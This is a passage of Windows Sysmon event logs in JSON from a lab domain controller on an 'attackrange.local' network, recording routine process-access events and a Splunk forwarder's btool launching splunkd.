07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1948,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1949,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nTargetProcessId: 2660\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001099DD0300}","TargetProcessId":"2660","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.670\r\nProcessGuid: {41C8662E-1F76-5F25-0000-001051DE0300}\r\nProcessId: 3076\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nParentProcessId: 2660\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.670","ProcessGuid":"{41C8662E-1F76-5F25-0000-001051DE0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F76-5F25-0000-001099DD0300}","ParentProcessId":"2660","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F76-5F25-0000-001099DD0300}\r\nSourceProcessId: 2660\r\nSourceThreadId: 2668\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nTargetProcessId: 3076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F76-5F25-0000-001099DD0300}","SourceProcessId":"2660","SourceThreadId":"2668","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010E3900300}","TargetProcessId":"3076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nTargetProcessId: 3076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010E3900300}","TargetProcessId":"3076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 